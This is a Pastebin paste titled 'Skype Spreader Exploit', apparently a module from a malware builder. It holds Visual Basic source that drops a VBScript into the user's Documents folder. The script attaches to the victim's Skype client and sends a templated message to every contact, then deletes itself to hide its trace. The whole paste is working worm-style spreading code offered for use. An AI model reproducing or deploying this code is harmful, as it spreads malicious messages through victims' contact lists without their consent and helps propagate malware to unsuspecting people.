Dev

Skype Spreader Exploit [VB] HQ

Dev
May 1st, 2017
37,640
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.07 KB | None | 0 0
  1. #UDT
  2. #UltimateDevTeam
  3.  
  4. Sub SkypeSpread()
  5. If "%SKYPE%" = "True" Then
  6. Try
  7. Dim g As New StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) & "\cc.vbs")
  8. g.BaseStream.Seek(0, SeekOrigin.End)
  9. g.WriteLine("on error resume next")
  10. g.WriteLine("set Fruxr = WScript.CreateObject(""Skype4COM.Skype"", ""Skype_"")")
  11. g.WriteLine("Fruxr.Client.Start()")
  12. g.WriteLine("Fruxr.Attach()")
  13. g.WriteLine("For Each KZN In Fruxr.Friends")
  14. g.WriteLine("Fruxr.SendMessage KZN.handle,""%IMMESSAGE%""")
  15. g.WriteLine("next")
  16. g.Close()
  17. Dim p As New Process
  18. Dim ProcessProperties As New ProcessStartInfo
  19. ProcessProperties.FileName = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) & "\cc.vbs"
  20. Dim myProcess As Process = Process.Start(ProcessProperties)
  21. myProcess.WaitForExit()
  22. Threading.Thread.Sleep(5000)
  23. IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) & "\cc.vbs")
  24. Catch ex As Exception
  25. MsgBox(ex.ToString)
  26. End Try
  27. End If
  28. End Sub
Add Comment
Please, Sign In to add comment